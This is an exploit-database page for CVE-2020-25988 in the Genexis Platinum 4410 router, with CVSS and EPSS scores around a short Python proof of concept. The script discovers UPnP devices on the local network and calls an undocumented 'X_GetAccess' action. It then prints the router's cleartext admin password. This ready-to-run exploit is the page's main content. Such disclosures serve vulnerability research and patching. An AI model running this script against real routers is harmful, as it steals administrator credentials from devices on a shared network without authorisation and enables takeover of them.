Lucene search

K
zdtNitesh Surana1337DAY-ID-35278
HistoryNov 19, 2020 - 12:00 a.m.

Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure Exploit

2020-11-1900:00:00
Nitesh Surana
0day.today
25
upnp exposure
genexis platinum 4410
router 2.1
vendor homepage
cve-2020-25988
credential exploit
network security
device discovery
service execution

CVSS2

3.3

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:A/AC:L/Au:N/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.121

Percentile

95.5%

# Exploit Title: Genexis Platinum 4410 Router 2.1 - UPnP Credential Exposure
# Exploit Author: Nitesh Surana
# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Version: P4410-V2-1.34H
# Tested on: Windows/Kali
# CVE : CVE-2020-25988

import upnpy

upnp = upnpy.UPnP()

# Discover UPnP devices on the network
# Returns a list of devices e.g.: [Device <Econet IGD>]
devices = upnp.discover()

# Select the device directly from the list
device = devices[0]

# Get the services available for this device
# Returns a list of services available for the device
# device.get_services()

# We can now access a specific service on the device by its ID like a dictionary 
service = device['DeviceInfo1']

# Execute the action by its name (in our case, the 'X_GetAccess' action)
# Returns a dictionary containing the cleartext password of 'admin' user.
print("Admin Password: {}".format(service.X_GetAccess()['NewX_RootPassword']))

CVSS2

3.3

Attack Vector

ADJACENT_NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:A/AC:L/Au:N/C:P/I:N/A:N

CVSS3

6.5

Attack Vector

ADJACENT

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS

0.121

Percentile

95.5%

Related for 1337DAY-ID-35278